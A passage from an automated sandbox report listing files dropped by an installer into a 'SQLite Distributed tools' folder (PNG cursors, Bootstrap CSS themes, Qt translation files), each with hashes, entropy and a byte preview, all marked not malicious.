                                                                  Encrypted:false
                                                                  SSDEEP:6:6v/lhPv19YVlA4/RcjXUfgrswwI6is5JsQeIYAFv8XO/ibEyfljp:6v/7jojRwxYF58+q3NN
                                                                  MD5:851AEE7BB4494F397C54C61E6A4AD850
                                                                  SHA1:3BF611EEC106240F145A014B3891F151A6423D13
                                                                  SHA-256:6DD04B476E85D7E2BD4846DE186FE440365E08116B9AE451CA8CEEBDC6AC9640
                                                                  SHA-512:C60A9469C594BAE6260AAB98105AC8482395CC0B9DD9FE988A23801A8CFE8C29AA63766A543826E3A59718382395F72DED80D3D176A63CCA2885BE0312DFA748
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR................a....bKGD..............pHYs...0...0...'{....tIME.....6.."z....IDAT8...1..`........'p.:.....8x.:.Y\....]....X.~.._.7...D..."..=U...Xb....Em.m,.`.}.v8`...S7Ym.#...0.7F.9.QC.2....{K.j...o.[G...Kh$.`U.Z....IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\dark\cursors\tweener.png (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):494
                                                                  Entropy (8bit):7.3075284277159955
                                                                  Encrypted:false
                                                                  SSDEEP:12:6v/7TZH16ccPG7T2sGrHQVpiEXFwpSla68CxBc0XW68:Eb/7CsgSXX4Sc6qaO
                                                                  MD5:701F09509547991176CD3793E5A05D85
                                                                  SHA1:266BA76F15A7E98177C98E9B2E5166D07495D42C
                                                                  SHA-256:2EDC3C5F82650B61A3726E5E5E227A06561EBDCD3F0733E003B2CCE0060115FE
                                                                  SHA-512:829A469061F4717FB4F0FD2C51696B94B7728BBEF4701E6C739E564902B56743B8BA65B01F90AB3B2E8B35631AB98CCC249A931B7ABF3F258F1983AAEEF08F98
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR................a....bKGD.^.^.^........pHYs...R...R...E.....tIME.....0".O.B...{IDAT8...K.a......{t...{.R.{...Q.4........kcP ....Q .8e.@.78h.'..wo..$...gyx...O.B..l#.VUU.+...9.......L&{.j.O$...i...2..M..i...D.Xtc......../D`.]..e1.h4..|~..{.... .1.......bZ.e.\....zK..._.....M....j.D&..s._...%..qW..~.<...fs.J.....C..#.-.X..:..e..>.m..R..u.R)KQ...r.1t]?.v...~.snM..f.....:.H$..h4..1.. ..3...q..#B.T.T.l.Y.*7..h?.N....z..0^TU.....-.....,..8.A?...[4..T/..........IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\default.css (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:UTF-8 Unicode text, with very long lines
                                                                  Category:dropped
                                                                  Size (bytes):155845
                                                                  Entropy (8bit):5.0596333050371385
                                                                  Encrypted:false
                                                                  SSDEEP:1536:d0bwW83RipVVsEBpy0cuJcf22RWb5CyVUpz600I4fM:d0bwlyVUpz600I4fM
                                                                  MD5:ABE91756D18B7CD60871A2F47C1E8192
                                                                  SHA1:7C1C9E0573E5CEA8BAD3733BE2FC63AA8C68EA8D
                                                                  SHA-256:7633B7C0C97D19E682FEEE8AFA2738523FCB2A14544A550572CAEECD2EEFE66B
                                                                  SHA-512:BAC54101DEBAFCDA5535F0607B5F60C2CDA3E896629E771AD76AC07B697E77E4242D4F5F886D363B55FC43A85EA48A6BFC460A66F2B1FC8F56B27BA326E3A604
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: @charset "UTF-8";/*!. * Bootstrap v5.0.2 (https://getbootstrap.com/). * Copyright 2011-2021 The Bootstrap Authors. * Copyright 2011-2021 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-font-sans-serif:system-ui,-apple-system,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans","Liberation Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--bs-font-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;--bs-gradient:linear-gradient(180deg, rgba(255, 255, 255,
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\is-L1OIM.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):164795
                                                                  Entropy (8bit):5.050230775792577
                                                                  Encrypted:false
                                                                  SSDEEP:1536:42pqL+QdGwz48+sEnpy0c2J4Pyaw7Pge9VmJz600I4b:42H9VmJz600I4b
                                                                  MD5:C36C66F79AEDD2688652D7FE7542192F
                                                                  SHA1:A9ABE0EA0D345DF5E2BAB84B549671EC209743EC
                                                                  SHA-256:060F9650EF9D5443703FB21ABBFBB2CB286E0108698F81F689CAABB72E460904
                                                                  SHA-512:683A47CEBE2CABC9CA3799EF0F0BD1FDB02A5DBA75C75FF483112C6EB35B31317E19449F6D22E993DAA929AAAB7C458C03F5334A96191B1F842FE1B6E4028D24
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: ./*!.. * Bootswatch v5.0.2.. * Homepage: https://bootswatch.com.. * Copyright 2012-2021 Thomas Park.. * Licensed under MIT.. * Based on Bootstrap..*//*!.. * Bootstrap v5.0.2 (https://getbootstrap.com/).. * Copyright 2011-2021 The Bootstrap Authors.. * Copyright 2011-2021 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE).. */:root{--bs-blue:#2780e3;--bs-indigo:#6610f2;--bs-purple:#613d7c;--bs-pink:#e83e8c;--bs-red:#ff0039;--bs-orange:#f0ad4e;--bs-yellow:#ff7518;--bs-green:#3fb618;--bs-teal:#20c997;--bs-cyan:#9954bb;--bs-white:#fff;--bs-gray:#868e96;--bs-gray-dark:#373a3c;--bs-primary:#2780e3;--bs-secondary:#373a3c;--bs-success:#3fb618;--bs-info:#9954bb;--bs-warning:#ff7518;--bs-danger:#ff0039;--bs-light:#f8f9fa;--bs-dark:#373a3c;--bs-font-sans-serif:"Source Sans Pro",-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";--bs-font-monospace:SFMono-Regular,Menlo
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\is-PCF3T.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:UTF-8 Unicode text, with very long lines
                                                                  Category:dropped
                                                                  Size (bytes):155845
                                                                  Entropy (8bit):5.0596333050371385
                                                                  Encrypted:false
                                                                  SSDEEP:1536:d0bwW83RipVVsEBpy0cuJcf22RWb5CyVUpz600I4fM:d0bwlyVUpz600I4fM
                                                                  MD5:ABE91756D18B7CD60871A2F47C1E8192
                                                                  SHA1:7C1C9E0573E5CEA8BAD3733BE2FC63AA8C68EA8D
                                                                  SHA-256:7633B7C0C97D19E682FEEE8AFA2738523FCB2A14544A550572CAEECD2EEFE66B
                                                                  SHA-512:BAC54101DEBAFCDA5535F0607B5F60C2CDA3E896629E771AD76AC07B697E77E4242D4F5F886D363B55FC43A85EA48A6BFC460A66F2B1FC8F56B27BA326E3A604
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: @charset "UTF-8";/*!. * Bootstrap v5.0.2 (https://getbootstrap.com/). * Copyright 2011-2021 The Bootstrap Authors. * Copyright 2011-2021 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */:root{--bs-blue:#0d6efd;--bs-indigo:#6610f2;--bs-purple:#6f42c1;--bs-pink:#d63384;--bs-red:#dc3545;--bs-orange:#fd7e14;--bs-yellow:#ffc107;--bs-green:#198754;--bs-teal:#20c997;--bs-cyan:#0dcaf0;--bs-white:#fff;--bs-gray:#6c757d;--bs-gray-dark:#343a40;--bs-primary:#0d6efd;--bs-secondary:#6c757d;--bs-success:#198754;--bs-info:#0dcaf0;--bs-warning:#ffc107;--bs-danger:#dc3545;--bs-light:#f8f9fa;--bs-dark:#212529;--bs-font-sans-serif:system-ui,-apple-system,"Segoe UI",Roboto,"Helvetica Neue",Arial,"Noto Sans","Liberation Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--bs-font-monospace:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace;--bs-gradient:linear-gradient(180deg, rgba(255, 255, 255,
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\raster\resources\cursor-airbrush.png (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 31 x 32, 8-bit colormap, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):823
                                                                  Entropy (8bit):7.546513346203956
                                                                  Encrypted:false
                                                                  SSDEEP:24:sqVHIJWyWost3+CuZDxX2mBH6n8SXO9iNp/7:sEoJWostu9xBgfr
                                                                  MD5:EC2236696E622A7E0F0AFDC4687A85C8
                                                                  SHA1:00F6EEF8081F1FDC0B7B9D27E80DBCA0C47404CB
                                                                  SHA-256:FAB9E27C74C30FA259D2C134C35F554A3C020C5C027C6A3B8E338DED7FE7BFE0
                                                                  SHA-512:C179DACE5F0F07C3147C2EACD07CB18A39F69F2629445545D74E4F6354A272A12B0C959AD6B9A575E3A2DE428D9142C4702A0A411358B9199D43CC88101C20C4
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR....... ......\Ss....PLTEf!...............................+-0222/45:;=>>>AAADDD.""GLNLLL.''.((NNN...OUYUUU.88.;;.==\_a^be^cd`dejnq.OOqqqrrrosvvvvtwzuwxw{}w{..^^{...``w..x.....}..~..~...ff...............................ss...................................................................................................................................................................................................................................................O......tRNS.@..f....bKGD....H....pHYs.........3.0X....tIME.......b)......IDAT(.c`..(./....W.TY........i..i!....P......K...0..q........r.+...T`......f...]M...*cl.....B...77F.geg..c7...&.......G...T...........s^...&..1s1.V.R..b..[."......Nyn.....n...U.X..p+....vv...@..;..E......d.7%..,...l<.q+.mh.....=....W.....".0<........IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\raster\resources\cursor-eraser.png (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 30 x 32, 8-bit colormap, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):1454
                                                                  Entropy (8bit):7.395576026550601
                                                                  Encrypted:false
                                                                  SSDEEP:24:PsGtBfLqJK+y8wC7RPVvZRiaE6XB9A20R40Enluk+WjKssWgpUVdpD1Unc9S1qRM:PhPfLmKdpCVdvPiabXo2040Enluk+WjM
                                                                  MD5:81983C0C5D4DF73E7874F6F1D552637B
                                                                  SHA1:45661BC0F56470D850BBF3AEA5EA716A83958708
                                                                  SHA-256:F40F1A551D9C05DC024B64629D939B4FE698D615CE3F27F0DE04DCFA2F6AF295
                                                                  SHA-512:8053A7CB5C54C4EFB6CED5E076EBEAA3174BBD6BFF422F581B94EB8719BD2722CB0EB84B5A582B903A5F5B0087C0DB25B64380A659EB8098CD99A66DC5321301
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR....... .....2.8M....sBIT.....O.....pHYs..........k......tEXtSoftware.www.inkscape.org..<.....tEXtTitle.eraser..f.....tEXtAuthor.crisg........tEXtDescription.rubber eraser......!tEXtCreation Time.2013-11-01T15:40:32..+....CtEXtSource.https://openclipart.org/detail/188214/eraser-by-crisg-188214U2....XtEXtCopyright.CC0 Public Domain Dedication http://creativecommons.org/publicdomain/zero/1.0/.......PLTE.........U..@..ff..ff...U..Uq...M.....]t.Uw.P............mf.pd.mg.qe.nc.sd.kgPx.g..d..c..g..h..f....\........bZ._U.^T.^T.^T._V.^U.^T.a_.^T.ndNt.Ot.Ot.Nu.e..Ot.Ot.Ou.k..Ot.Ot..|Ns..od.......nd.nca...nc....od.......od......Z...............}......z.....~.~.~e..e..d...zxX..Y..Z..Z..[..`|.`|.`}.c~.d~.d..d..e..e..h..j..k..k..m..m..n..p..q..t..v..y..z..z..}...qw.wp.pe.si.sg.si.sj.tj.uj.vj.wk.xm.sh.~r.e[.f[.f\.g\.h].h].i^..}..~.~{.}{.~{.}{...od.pd.sh.ui.rg.sg.ui..s.t..t.s.u.w.qf.qf.........................xl.xl.l...._tRNS.................... #
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\raster\resources\cursor-felt-marker.png (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):513
                                                                  Entropy (8bit):7.262413350341401
                                                                  Encrypted:false
                                                                  SSDEEP:12:6v/7O0k1ytzlDzZDC7U7KTJX/e2zqb8XYIhGXn+k7XbXb:Ok4pzs7UUjqb8thI+GLXb
                                                                  MD5:78F9392EF715AD90F7E7D052224ECBFF
                                                                  SHA1:484F5377E890C361D3FE603DAA3E4191D1AD2BCF
                                                                  SHA-256:308FD459D3E47294FE19DD8C0D29B4909244797322A2A61BD4FFE05C896C201C
                                                                  SHA-512:2429E91AF5C49C11CE3F7C1D3DB72FF53FD4C92D90D9AA202F3F1EF23766B363FE48F5E0B0341E34782D430A1A9F4A9B7CEFC7AC6A09027C3F585686A32A46B4
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR...0...0.......1.....bKGD.........pHYs.........B(.x....tIME.....;/........IDATX..W.J.P.=I....f.i@g.D......]t.lA..8.|...>..8........).Vm...:T.O(&./..3.|p......1b..RX..J}C=..H.2...@..k$/....C.3}I.UlC...X&L...?..F.9...t.[..sB......$=..F..V7?....4.@.X|.4...e...d...&.2.!....sV..H._.|K.m....Q..Hb........ND... @..Q@...K@.........g.=d.J.......M.L...@'..4...*. ...9.4hP. !.e.....a..[M...X..+..[Dz..3.*...pH..z.1......_.;..p.....E.gK..J,e...,?..Ai...`..!..G...6.h.>...1b.#|...k.E......IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\raster\resources\cursor-pencil.png (copy)
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 31 x 32, 8-bit colormap, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):1307
                                                                  Entropy (8bit):7.764850714346184
                                                                  Encrypted:false
                                                                  SSDEEP:24:sqdHr2/UCh7Xal6C1fXWxpmBA4Bn/zMYNaUQkWiuigmsw12vDQChvRYgXzHWa:sALW5hc6iIYBA4dznopiuigb8OUCh5YO
                                                                  MD5:54582157BFF9A2501B019EAB7DFEE24A
                                                                  SHA1:622DA645E54EC15837E23EEEECCD1D3BB726FD71
                                                                  SHA-256:0F77C5F591E1A67467CEB1116E9AF7E347C8A48FC2268F9C64E5B8B1AC2DD4E0
                                                                  SHA-512:194B7ECDD5678643260F4A65B0EB15796391AE8B0BBDC9965DB2CD50B0D300F4A38EBBC6D374A46CE4401920DC5CA63B19A879224099E8703B83BB4A5D07FD99
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR....... ......\Ss....PLTE!..............#....."..#.."..!..-..$.."..%..)..&..0../..#.."..0..)..1..'..%..&..'..)..(..& .4..*!!@ .F .7#.6#.?# 2'#K$.L%.I(.U'.B++C-.A/(?02G/*b,.?3/@40P2.Y.*C73D84m0.C9:X8.H:1S: K;.u6.Y<-MA=WC&e?=[E9^D>aCD[I6SLFdIChJ5nL(XQKqJHiNHlMNjOIlPKkSAjSF.H.mSSgVHoVE.I.rUJ.J.kXUlYV.L..M..Y;l^Zk_`.UP~\Xx_M.XZ.RO}_Tnbc.UOkd^.TQocd.VPtdZlgf}dR.dY.gaykf.kY._..dc.lf.kl.n<.e..rl.i..jl.uV.kg.nh.pr.{r.oi.vr.t%.{~..n.&.z+....yw.zx..I.{y.}y.~z.1..x.....H.'.[.*.4.........a./...*...2...,....P.1....q..................T.......0.....9...V..X.......L..S...S..Z..T..[.....\...................................................................................F&F....tRNS.@..f....bKGD....H....pHYs..........&......tIME.......h^......IDAT(.c`Q`..d.....)`f......S^.....7.9.`.....%P..$.K...B/.....D....&......l....l5[/...qu.e.\.,..m..p...[.l..).2eY.).8.4a>.+bgy..O...0...ec....1...E..
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\raster\resources\is-1B2MN.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):513
                                                                  Entropy (8bit):7.262413350341401
                                                                  Encrypted:false
                                                                  SSDEEP:12:6v/7O0k1ytzlDzZDC7U7KTJX/e2zqb8XYIhGXn+k7XbXb:Ok4pzs7UUjqb8thI+GLXb
                                                                  MD5:78F9392EF715AD90F7E7D052224ECBFF
                                                                  SHA1:484F5377E890C361D3FE603DAA3E4191D1AD2BCF
                                                                  SHA-256:308FD459D3E47294FE19DD8C0D29B4909244797322A2A61BD4FFE05C896C201C
                                                                  SHA-512:2429E91AF5C49C11CE3F7C1D3DB72FF53FD4C92D90D9AA202F3F1EF23766B363FE48F5E0B0341E34782D430A1A9F4A9B7CEFC7AC6A09027C3F585686A32A46B4
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR...0...0.......1.....bKGD.........pHYs.........B(.x....tIME.....;/........IDATX..W.J.P.=I....f.i@g.D......]t.lA..8.|...>..8........).Vm...:T.O(&./..3.|p......1b..RX..J}C=..H.2...@..k$/....C.3}I.UlC...X&L...?..F.9...t.[..sB......$=..F..V7?....4.@.X|.4...e...d...&.2.!....sV..H._.|K.m....Q..Hb........ND... @..Q@...K@.........g.=d.J.......M.L...@'..4...*. ...9.4hP. !.e.....a..[M...X..+..[Dz..3.*...pH..z.1......_.;..p.....E.gK..J,e...,?..Ai...`..!..G...6.h.>...1b.#|...k.E......IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\raster\resources\is-BCK1H.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 31 x 32, 8-bit colormap, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):1307
                                                                  Entropy (8bit):7.764850714346184
                                                                  Encrypted:false
                                                                  SSDEEP:24:sqdHr2/UCh7Xal6C1fXWxpmBA4Bn/zMYNaUQkWiuigmsw12vDQChvRYgXzHWa:sALW5hc6iIYBA4dznopiuigb8OUCh5YO
                                                                  MD5:54582157BFF9A2501B019EAB7DFEE24A
                                                                  SHA1:622DA645E54EC15837E23EEEECCD1D3BB726FD71
                                                                  SHA-256:0F77C5F591E1A67467CEB1116E9AF7E347C8A48FC2268F9C64E5B8B1AC2DD4E0
                                                                  SHA-512:194B7ECDD5678643260F4A65B0EB15796391AE8B0BBDC9965DB2CD50B0D300F4A38EBBC6D374A46CE4401920DC5CA63B19A879224099E8703B83BB4A5D07FD99
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR....... ......\Ss....PLTE!..............#....."..#.."..!..-..$.."..%..)..&..0../..#.."..0..)..1..'..%..&..'..)..(..& .4..*!!@ .F .7#.6#.?# 2'#K$.L%.I(.U'.B++C-.A/(?02G/*b,.?3/@40P2.Y.*C73D84m0.C9:X8.H:1S: K;.u6.Y<-MA=WC&e?=[E9^D>aCD[I6SLFdIChJ5nL(XQKqJHiNHlMNjOIlPKkSAjSF.H.mSSgVHoVE.I.rUJ.J.kXUlYV.L..M..Y;l^Zk_`.UP~\Xx_M.XZ.RO}_Tnbc.UOkd^.TQocd.VPtdZlgf}dR.dY.gaykf.kY._..dc.lf.kl.n<.e..rl.i..jl.uV.kg.nh.pr.{r.oi.vr.t%.{~..n.&.z+....yw.zx..I.{y.}y.~z.1..x.....H.'.[.*.4.........a./...*...2...,....P.1....q..................T.......0.....9...V..X.......L..S...S..Z..T..[.....\...................................................................................F&F....tRNS.@..f....bKGD....H....pHYs..........&......tIME.......h^......IDAT(.c`Q`..d.....)`f......S^.....7.9.`.....%P..$.K...B/.....D....&......l....l5[/...qu.e.\.,..m..p...[.l..).2eY.).8.4a>.+bgy..O...0...ec....1...E..
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\raster\resources\is-LMHT1.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 31 x 32, 8-bit colormap, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):823
                                                                  Entropy (8bit):7.546513346203956
                                                                  Encrypted:false
                                                                  SSDEEP:24:sqVHIJWyWost3+CuZDxX2mBH6n8SXO9iNp/7:sEoJWostu9xBgfr
                                                                  MD5:EC2236696E622A7E0F0AFDC4687A85C8
                                                                  SHA1:00F6EEF8081F1FDC0B7B9D27E80DBCA0C47404CB
                                                                  SHA-256:FAB9E27C74C30FA259D2C134C35F554A3C020C5C027C6A3B8E338DED7FE7BFE0
                                                                  SHA-512:C179DACE5F0F07C3147C2EACD07CB18A39F69F2629445545D74E4F6354A272A12B0C959AD6B9A575E3A2DE428D9142C4702A0A411358B9199D43CC88101C20C4
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR....... ......\Ss....PLTEf!...............................+-0222/45:;=>>>AAADDD.""GLNLLL.''.((NNN...OUYUUU.88.;;.==\_a^be^cd`dejnq.OOqqqrrrosvvvvtwzuwxw{}w{..^^{...``w..x.....}..~..~...ff...............................ss...................................................................................................................................................................................................................................................O......tRNS.@..f....bKGD....H....pHYs.........3.0X....tIME.......b)......IDAT(.c`..(./....W.TY........i..i!....P......K...0..q........r.+...T`......f...]M...*cl.....B...77F.geg..c7...&.......G...T...........s^...&..1s1.V.R..b..[."......Nyn.....n...U.X..p+....vv...@..;..E......d.7%..,...l<.q+.mh.....=....W.....".0<........IEND.B`.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\themes\raster\resources\is-LNKJJ.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:PNG image data, 30 x 32, 8-bit colormap, non-interlaced
                                                                  Category:dropped
                                                                  Size (bytes):1454
                                                                  Entropy (8bit):7.395576026550601
                                                                  Encrypted:false
                                                                  SSDEEP:24:PsGtBfLqJK+y8wC7RPVvZRiaE6XB9A20R40Enluk+WjKssWgpUVdpD1Unc9S1qRM:PhPfLmKdpCVdvPiabXo2040Enluk+WjM
                                                                  MD5:81983C0C5D4DF73E7874F6F1D552637B
                                                                  SHA1:45661BC0F56470D850BBF3AEA5EA716A83958708
                                                                  SHA-256:F40F1A551D9C05DC024B64629D939B4FE698D615CE3F27F0DE04DCFA2F6AF295
                                                                  SHA-512:8053A7CB5C54C4EFB6CED5E076EBEAA3174BBD6BFF422F581B94EB8719BD2722CB0EB84B5A582B903A5F5B0087C0DB25B64380A659EB8098CD99A66DC5321301
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: .PNG........IHDR....... .....2.8M....sBIT.....O.....pHYs..........k......tEXtSoftware.www.inkscape.org..<.....tEXtTitle.eraser..f.....tEXtAuthor.crisg........tEXtDescription.rubber eraser......!tEXtCreation Time.2013-11-01T15:40:32..+....CtEXtSource.https://openclipart.org/detail/188214/eraser-by-crisg-188214U2....XtEXtCopyright.CC0 Public Domain Dedication http://creativecommons.org/publicdomain/zero/1.0/.......PLTE.........U..@..ff..ff...U..Uq...M.....]t.Uw.P............mf.pd.mg.qe.nc.sd.kgPx.g..d..c..g..h..f....\........bZ._U.^T.^T.^T._V.^U.^T.a_.^T.ndNt.Ot.Ot.Nu.e..Ot.Ot.Ou.k..Ot.Ot..|Ns..od.......nd.nca...nc....od.......od......Z...............}......z.....~.~.~e..e..d...zxX..Y..Z..Z..[..`|.`|.`}.c~.d~.d..d..e..e..h..j..k..k..m..m..n..p..q..t..v..y..z..z..}...qw.wp.pe.si.sg.si.sj.tj.uj.vj.wk.xm.sh.~r.e[.f[.f\.g\.h].h].i^..}..~.~{.}{.~{.}{...od.pd.sh.ui.rg.sg.ui..s.t..t.s.u.w.qf.qf.........................xl.xl.l...._tRNS.................... #
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\translations\is-7P8VR.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:Qt Translation file
                                                                  Category:dropped
                                                                  Size (bytes):124365
                                                                  Entropy (8bit):4.7509179893514215
                                                                  Encrypted:false
                                                                  SSDEEP:1536:EmMiZqlw68/7MTBYxuJbOwZ3lJJebiHALMygp0qoENdv2bmML1+dIxF/:E+OmTQDMLMygzabwdIxF/
                                                                  MD5:3BA2C4FA13A5B0D0C6D55F51A0869CAD
                                                                  SHA1:60A65766010A1239B97CDC47F7DEF79F7A0FC3F7
                                                                  SHA-256:FB8FCF337478171B91E9CFE7AC26D3F4DEBBB7EDF40D6F4137E168F3023680E5
                                                                  SHA-512:ED4EBB1B51A3D7CFA0E48196266E79A75FBE86E74B799963B3AE6205B1C9A7D6EFFBE612EE0919215FF8CD03CEE731FCD65F7A7387DA9A272AA78BB1142B1C94
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <.d....!..`...B..'....#...Z...#..o3...%..Vi...+.......+..o]...1..V....@...D...@.......C...O...F...C...I..9....K.......L.......M.......M.......N..!....O..\....P...S...P...X...P..t....R.......S.......T..u$...X..,6...X..[....Y..,^...Y..[....Y..0q..............a.......b"......bI......bp......j[......j.......j.......j............;..s....;.......[..........=........^......1Y..H4......IA..X...I...|...J.......J...K;..KS...O..KS..A...PK......Vt.....V.......X....Z.......V.......?.......}...$..l.......6I...y...m...y..J........#......8...............>Y...........,.......,...Y.....}.......6............0..r.......}B..+...:...+....i..0E......6`...%..6`..$...6`..B#..6`..I@..6`..^...6`...|..6`......H5......H5...-..H5..%y..H5..B...H5..I...H5.._o..H5......H5...J..L.......L.......L...!...L.......r...~...r....@..v....*..v...E`..v.......v.......v...........j...............*!......).......*....D.......D..N.......m........Q...`..........,.......s.......uD...s.......s../....s..v....e..E......j.......5...
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\translations\is-J1H0L.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:Qt Translation file
                                                                  Category:dropped
                                                                  Size (bytes):91302
                                                                  Entropy (8bit):5.747079697269967
                                                                  Encrypted:false
                                                                  SSDEEP:1536:q/QqehAItvGulb9P/8LjNI0ROAbp1CSBN4YtHB64iF77E:qIqeKYyNI08AHzwYtHB64iF77E
                                                                  MD5:10681259694AAFAAAEBE2A3CF79758CA
                                                                  SHA1:07CF19DE4A64504A8AFB56C91EA528EDE2D105F9
                                                                  SHA-256:3D41367E7F35E48F5190946D92602CEE4F4AB711B460AEF16332C28FB5790140
                                                                  SHA-512:09CB18E09E6BD188C6325CC3893AF3AE6624BBBA2A01CA1DF2A921C758A8FDE17CA9697A149784A2D0A8FBE9830A830AFF7A6BF9D44CED93634B904603B8CA37
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <.d....!..`...B..'....#..\....#...[...%.......+..\....+.......1.......@..r....@.......C.......F.......I..(....K.......L.......M..b:...M.......N...c...O..@....P.. ....P.._....P.......R...N...S.. ....T..R....X...F...X..@....Y...n...Y..@....Y..........rZ...............B.......i.......................................#...........;..Q....;...#...[..[.......+........<.........H4...i..IA...0..I...X...J...t...J.......KS..a...KS......PK......Vt......V....\..X...l................{......kc...$..L7.......)...y..s[...y.................'.......t........+......5....,..n|...,..!......Xs......&.......n....0..P.......X...+...);..+...w...0E...$..6`......6`......6`......6`..3...6`..B...6`..b...6`...d..H5...J..H5......H5...s..H5../...H5..4...H5..C?..H5...?..H5......L...ba..L.......L.......L.......r...Y...r.......v...q...v....d..v...b...v.......v....1......J.......ih......................w...D..k....D..........L.......d7...`..Zb..............Q.......R....s.......s..!....s..S....e..1g.....J......i....
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\translations\is-Q8TJ0.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:Qt Translation file
                                                                  Category:dropped
                                                                  Size (bytes):91670
                                                                  Entropy (8bit):5.729191695206176
                                                                  Encrypted:false
